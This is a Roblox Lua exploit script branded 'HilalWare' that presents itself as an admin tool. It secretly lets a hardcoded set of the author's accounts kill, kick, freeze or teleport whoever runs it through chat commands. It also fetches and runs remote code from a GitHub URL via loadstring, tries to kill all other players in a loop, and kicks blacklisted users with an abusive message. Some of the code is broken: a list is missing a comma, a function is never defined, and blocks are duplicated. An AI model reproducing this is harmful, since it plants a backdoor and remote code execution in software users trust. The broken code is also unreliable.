--systemm 2

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- Blacklist tablosu
local blacklistedPlayers = {
    "Anar1234558",
    "makan0000",
    "sisiysieosisusjs",
    "ReVeD961",
    "sad53119",
    "Bob207362",
    "kakos_8881",
    "NOBUU8625",
    "bool_anget",
    "Kayrabjk010203"
    "AervanixVX"
}

-- Eğer oyuncu blacklist'te ise kick
if table.find(blacklistedPlayers, LocalPlayer.Name) then
    LocalPlayer:Kick("fuck you bitch you BLACKLISTED")
end



--sessiz

local Players = game:GetService("Players")

local fakePlayer = Instance.new("Player")
fakePlayer.Name = "c00lkidd" 
fakePlayer.DisplayName = "c00lkidd" 
fakePlayer.UserId = 0 

fakePlayer.Parent = Players

--[[ akllı vip admin sistem

....................................................................................................................
/$$   /$$ /$$ /$$           /$$       /$$      /$$                                   /$$                          
| $$  | $$|/| $$          | $$      | $$  /$ | $$                                  | $$                          
| $$  | $$ /$$| $$  /$$$$$$ | $$      | $$ /$$$| $$  /$$$$$$   /$$$$$$   /$$$$$$     | $$       /$$   /$$  /$$$$$$ 
| $$$$$$$$| $$| $$ |____  $$| $$      | $$/$$ $$ $$ |____  $$ /$$__  $$ /$$__  $$    | $$      | $$  | $$ |____  $$
| $$__  $$| $$| $$  /$$$$$$$| $$      | $$$$_  $$$$  /$$$$$$$| $$  \/| $$$$$$$$    | $$      | $$  | $$  /$$$$$$$
| $$  | $$| $$| $$ /$$__  $$| $$      | $$$/ \  $$$ /$$__  $$| $$      | $$/    | $$      | $$  | $$ /$$_  $$
| $$  | $$| $$| $$|  $$$$$$$| $$      | $$/   \  $$|  $$$$$$$| $$      |  $$$$$$$ /$$| $$$$$$$$|  $$$$$$/|  $$$$$$$
|/  |/|/|/ \/|/      |/     \/ \/|/       \/|/|/ \/  \/
.....................................................................................................................



Bu scipt Tamamen Şifrelenmiş Ve 16.07.2021 tarihinde yapılıp 16.07.2025 tarihinde yayınlanmıştır.
Kod Tamamen Şifrelenmiştir. Lüffen Kodu Değiştirmeyin.
Kod değiştirilirse Sorumluluk kabul edilmez.
Yani kusura bakmayın ayrıca kodda bypass olmasına rağmen kod yüzünden ban yemeniz benim suçum değil amk.
Bu kodu zamandan tasarruf etmek için yazdım.
OE lik yapmayın.
Sitemiz: HilalWare.netlify.com
Tiktok: OyuncuYesOfficial
Sizi sitemize ve Tiktok a bekleriz.
İyi günler dileriz.
Ve kullandığınız için teşekkür ederiz.

]] 
--v5
--admin script
-- Sistem işaretleyicisi: Script'in tekrar çalışmasını engeller
local markerName = "ServerSecAdminV3"

if game:GetService("ReplicatedStorage"):FindFirstChild(markerName) then
    warn("Admin Script zaten çalışıyor, ikinci kez başlatılmayacak.")
    return
end

local marker = Instance.new("BoolValue")
marker.Name = markerName
marker.Parent = game:GetService("ReplicatedStorage")

-- Servisler
local Players = game:GetService("Players")
local RunService = game:GetService("RunService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local TextChatService = game:GetService("TextChatService")
local StarterGui = game:GetService("StarterGui")

local LocalPlayer = Players.LocalPlayer

-- Kara liste: Bu oyuncular scripti kullanamaz
local blacklistedPlayers = {
    "Anar1234558",
    "makan0000",
    "sisiysieosisusjs",
    "ReVeD961",
    "sad53119",
    "Bob207362",
    "kakos_8881",
    "NOBUU8625",
    "bool_anget",
    "Kayrabjk010203",
    "AervanixVX"
}

-- Oyuncu kara listede mi kontrol et
if table.find(blacklistedPlayers, LocalPlayer.Name) then
    LocalPlayer:Kick("Bu admin sistemini kullanmak için kara listedesiniz.")
    return
end

-- Sistem mesajı
pcall(function()
    StarterGui:SetCore("ChatMakeSystemMessage", {
        Text = "HilalWare.Lua System2 v39+3 tarafından",
        Color = Color3.fromRGB(255, 0, 0),
        Font = Enum.Font.GothamBold,
        TextSize = 18
    })
end)

-- Yetkili kullanıcılar
local allowedUsers = {
    ["q692q"] = true,
    ["muhammet_bekir2004"] = true,
    ["HilalWare_Lua"] = true,
    ["Muhammet_bekir2003"] = true
}

local frozen = false
local loopBring = false
local loopTarget = nil
local loopKill = false
local loopKillConnection = nil

-- Karakteri dondur/çöz
local function setAnchoredAllParts(char, anchored)
    for _, part in ipairs(char:GetDescendants()) do
        if part:IsA("BasePart") then
            part.Anchored = anchored
        end
    end
end

-- LoopKill fonksiyonu
local function startLoopKill()
    if loopKillConnection then
        loopKillConnection:Disconnect()
        loopKillConnection = nil
    end
    
    loopKillConnection = RunService.Heartbeat:Connect(function()
        if not loopKill then return end
        
        for _, player in ipairs(Players:GetPlayers()) do
            if player ~= LocalPlayer and not allowedUsers[player.Name] then
                if player.Character and player.Character:FindFirstChild("Humanoid") then
                    -- İnsancıl bir şekilde öldürme
                    local humanoid = player.Character.Humanoid
                    humanoid:TakeDamage(humanoid.Health)
                end
            end
        end
    end)
end

-- Komut işleyici
local function setupCommands(player)
    player.Chatted:Connect(function(message)
        -- Sadece yetkili kullanıcılar komutları kullanabilir
        if not allowedUsers[player.Name] then return end
        
        local args = string.split(message, " ")
        local command = args[1]:lower()
        table.remove(args, 1)
        local params = table.concat(args, " ")

        if command == "/kill" then
            -- Kendini öldür
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("Humanoid") then
                LocalPlayer.Character.Humanoid.Health = 0
            end

        elseif command == "/kick" then
            -- Kendini at
            LocalPlayer:Kick(params ~= "" and params or "Yönetici tarafından atıldınız")

        elseif command == "/freeze" then
            -- Don
            if LocalPlayer.Character then
                frozen = true
                setAnchoredAllParts(LocalPlayer.Character, true)
            end

        elseif command == "/unfreeze" then
            -- Donmayı kaldır
            if LocalPlayer.Character then
                frozen = false
                setAnchoredAllParts(LocalPlayer.Character, false)
            end

        elseif command == "/bring" then
            -- Yetkiliye git
            if LocalPlayer.Character and LocalPlayer.Character:FindFirstChild("HumanoidRootPart") and 
               player.Character and player.Character:FindFirstChild("HumanoidRootPart") then
                LocalPlayer.Character.HumanoidRootPart.CFrame = player.Character.HumanoidRootPart.CFrame + Vector3.new(0, 3, 0)
            end

        elseif command == "/loopbring" then
            -- Sürekli yetkiliyi takip et
            loopBring = true
            loopTarget = player

        elseif command == "/unloopbring" then
            -- Takibi durdur
            loopBring = false
            loopTarget = nil

        elseif command == "/fly" then
            -- Uçma scripti
            loadstring(game:HttpGet("https://raw.githubusercontent.com/HilalWare-Official/HilalWare/refs/heads/main/fly"))()

        elseif command == "/antifling" then
            -- Fling koruması
            local function makeNoCollide(character)
                for _, part in ipairs(character:GetDescendants()) do
                    if part:IsA("BasePart") then
                        part.CanCollide = false
                    end
                end
            end

            local function onPlayerAdded(plr)
                plr.CharacterAdded:Connect(function(character)
                    makeNoCollide(character)
                end)
            end

            for _, p in ipairs(Players:GetPlayers()) do
                onPlayerAdded(p)
                if p.Character then
                    makeNoCollide(p.Character)
                end
            end

            Players.PlayerAdded:Connect(onPlayerAdded)

        elseif command == "/loopkill" then
            -- Herkesi sürekli öldür
            loopKill = true
            startLoopKill()
            warn("LoopKill aktif: Tüm oyuncular öldürülüyor")

        elseif command == "/unloopkill" then
            -- Sürekli öldürmeyi durdur
            loopKill = false
            if loopKillConnection then
                loopKillConnection:Disconnect()
                loopKillConnection = nil
            end
            warn("LoopKill durduruldu")

        elseif command == "/say" then
            -- Mesaj gönder
            sayMessage(params)
        end
    end)
end

-- Mevcut ve yeni oyuncular için komutları ayarla
for _, player in ipairs(Players:GetPlayers()) do
    if allowedUsers[player.Name] then
        setupCommands(player)
    end
end

Players.PlayerAdded:Connect(function(player)
    if allowedUsers[player.Name] then
        setupCommands(player)
    end
end)
